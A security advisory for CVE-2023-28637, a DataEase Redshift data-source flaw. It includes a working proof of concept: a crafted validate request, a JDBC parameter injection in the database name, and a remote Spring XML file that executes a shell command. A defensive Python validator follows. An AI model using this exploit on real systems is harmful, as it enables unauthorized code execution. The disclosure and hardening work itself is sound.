CVE-2023-28637: Remote code execution through the DataEase AWS Redshift data source
DataEase is an open source data visualization analysis tool. In Dataease users are normally allowed to modify data and the data sources are expected to properly sanitize data. The AWS redshift data source does not provide data sanitization which may lead to remote code execution. This vulnerability has been fixed in v1.18.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Impact
In DataEase, a normal user can manage data sources. The AWS Redshift data source does not apply proper security checks to the connection properties, which leads to remote code execution.
A normal user can supply the properties used to connect to AWS Redshift.
Unlike the pgsql and mysql data sources, the Redshift data source does not accept extraParams, but that does not prevent constructing a remote code execution.
The database field is neither normalized nor validated, so a database name of the following form is accepted as-is and its trailing query string is passed straight through to the JDBC driver: test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}
The complete configuration looks like this (Python, where payload holds the attacker-controlled URL substituted into socketFactoryArg):
configuration = {
    "initialPoolSize": 5, "schema": "jdbc",
    "extraParams": "",
    "minPoolSize": 5, "maxPoolSize": 50, "maxIdleTime": 30, "acquireIncrement": 5, "idleConnectionTestPeriod": 5,
    "connectTimeout": 5, "customDriver": "default", "queryTimeout": 30, "host": "192.168.0.100",
    "dataBase": "test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}".format(payload),
    "username": "test", "password": "test", "port": "5432"
}
The Redshift driver then reaches remote code execution the same way the pgsql driver does:
com.amazon.redshift.Driver#connect parses the injected URL parameters, and
com.amazon.redshift.core.SocketFactoryFactory#getSocketFactory instantiates the class named by socketFactory, passing socketFactoryArg to its constructor.
POC
POST /datasource/validate/ HTTP/1.1
Host: 192.168.0.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: [A normal user token]
LINK-PWD-TOKEN: null
Content-Length: 889
Origin: http://192.168.0.102/
Connection: close
Referer: http://192.168.0.102/

{"configuration":"<base64 of the JSON shown below>","apiConfiguration":[],"type":"redshift","name":"test","configurationEncryption":true}
The base64-decoded configuration is:
{"initialPoolSize":5,"schema":"jdbc","extraParams":"","minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5,"connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100","dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://192.168.0.100:48080/calculator2.xml","username":"test","password":"test","port":"5432"}
Then run an HTTP server at 192.168.0.100:48080 that serves the file calculator2.xml:
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="javax.script.ScriptEngineManager">
    <property name="message" value="#{ pb.getEngineByName('nashorn').eval('java.lang.Runtime.getRuntime().exec(''touch /tmp/redshift2'')') }" />
  </bean>
</beans>
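The root cause described above is that the dataBase field is concatenated into the JDBC URL verbatim, so URL syntax in the name becomes driver options. The following added example (not DataEase's code and not part of the advisory) shows the weak construction next to a hardened one, and a check that can be run over a /datasource/validate request body like the POC above. The identifier allowlist, the reading of configurationEncryption as "base64-encoded", and the function names (build_jdbc_url_unsafe, build_jdbc_url_safe, check_datasource_request) are assumptions made for this example; the malicious dataBase value is the one from the advisory.

```python
import base64
import json
import re

# Allowlist for a bare Redshift database name: letters, digits and underscores.
# The exact character set is an assumption for this example, not a DataEase rule.
DB_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")

# JDBC URL syntax that must never be reachable from a bare database name.
URL_METACHARS = set("?&=/;#")

# The dataBase value used in the advisory's proof of concept (taken from the page).
MALICIOUS_DB = (
    "test?socketFactory=org.springframework.context.support."
    "ClassPathXmlApplicationContext"
    "&socketFactoryArg=http://192.168.0.100:48080/calculator2.xml"
)


def build_jdbc_url_unsafe(host, port, database):
    """Weak pattern: the database name is concatenated verbatim, so a '?'
    inside the name turns the rest of it into driver options."""
    return f"jdbc:redshift://{host}:{port}/{database}"


def validate_database_name(name):
    """Return a list of findings; an empty list means the name is acceptable."""
    findings = []
    bad = "".join(sorted(c for c in set(name) if c in URL_METACHARS))
    if bad:
        findings.append(f"JDBC URL metacharacters in database name: {bad}")
    if not DB_NAME_RE.match(name):
        findings.append("database name is outside the identifier allowlist")
    if "socketfactory" in name.lower():
        findings.append("socketFactory option smuggled through database name")
    return findings


def build_jdbc_url_safe(host, port, database):
    """Hardened form: refuse to build a URL from a name that fails validation."""
    findings = validate_database_name(database)
    if findings:
        raise ValueError("; ".join(findings))
    return f"jdbc:redshift://{host}:{port}/{database}"


def is_rejected(database):
    """True when the hardened builder refuses the name."""
    try:
        build_jdbc_url_safe("192.168.0.100", 5432, database)
    except ValueError:
        return True
    return False


def check_datasource_request(body):
    """Inspect a /datasource/validate request body (already parsed to a dict).
    The advisory shows 'configuration' as base64 when configurationEncryption
    is true; treating the flag that way is an assumption of this example."""
    raw = body["configuration"]
    if body.get("configurationEncryption"):
        raw = base64.b64decode(raw).decode("utf-8")
    conf = json.loads(raw)
    return validate_database_name(str(conf.get("dataBase", "")))


def constructed_poc_request():
    """Constructed sample request mirroring the shape of the advisory's POC."""
    conf = {"schema": "jdbc", "host": "192.168.0.100", "port": "5432",
            "dataBase": MALICIOUS_DB, "username": "test", "password": "test"}
    encoded = base64.b64encode(json.dumps(conf).encode("utf-8")).decode("ascii")
    return {"configuration": encoded, "configurationEncryption": True,
            "type": "redshift", "name": "test", "apiConfiguration": []}


if __name__ == "__main__":
    print("unsafe URL:", build_jdbc_url_unsafe("192.168.0.100", 5432, MALICIOUS_DB))
    for finding in check_datasource_request(constructed_poc_request()):
        print("finding:", finding)
    print("safe URL:", build_jdbc_url_safe("192.168.0.100", 5432, "analytics"))
```

Validating the name against an identifier allowlist is the durable fix; the metacharacter and socketFactory checks are there to make the rejection reason explicit in logs. The same validate_database_name check applies to any other connection property that is spliced into a JDBC URL, which is why the pgsql and mysql data sources' extraParams deserve the same treatment.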
Affected versions: <= 1.18.4
Patches
The vulnerability has been fixed in v1.18.5.
Workarounds
It is recommended to upgrade the version to v1.18.5.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at [email protected]